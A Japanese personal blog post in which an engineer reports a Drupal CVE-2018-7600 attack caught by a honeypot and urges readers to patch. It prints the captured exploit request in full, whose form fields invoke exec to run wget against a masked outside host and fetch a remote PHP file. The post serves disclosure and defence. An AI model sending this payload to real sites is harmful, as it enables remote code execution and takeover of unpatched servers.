とりあえずブログ

SEとして働く会社員の雑多なブログ

Drupalを狙ったと思われるアタック(CVE-2018-7600)をキャッチ

先日より僕のハニーポットが動作しているのですが、さっそく怪しいアクセスをキャッチしたので、紹介します。

saito.hatenadiary.com

実際の僕のハニーポットで取得できたログはこんな感じです。

f:id:tkm03:20180416220415j:plain

一応あれかなと思いアクセス元のIPアドレスは伏せてあります。

今回キャッチしたアクセスログはこんな内容です。

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2FXXX.XXX.XXX.XXX%2Fdrupal.php

調べてみるとコンテンツ管理システムであるDrupal(ドルーパル)を狙ったと思われる攻撃でした。

脆弱性情報として、3/28に公開されていて修正パッチが展開されておりますが、まだパッチ未適用のサイトを狙ったものと思われます。

drupal-navi.jp

この攻撃では、攻撃者が任意のコードを実行できるというものなので、最悪の場合乗っ取られる可能性がある脆弱性です。

4/16だけで僕のハニーポットに9件も攻撃が来ているので、かなり流行している攻撃のようです。

怖っ!

Drupal(ドルーパル)を導入している皆さんは早めのパッチ適用をしてくださいね!!!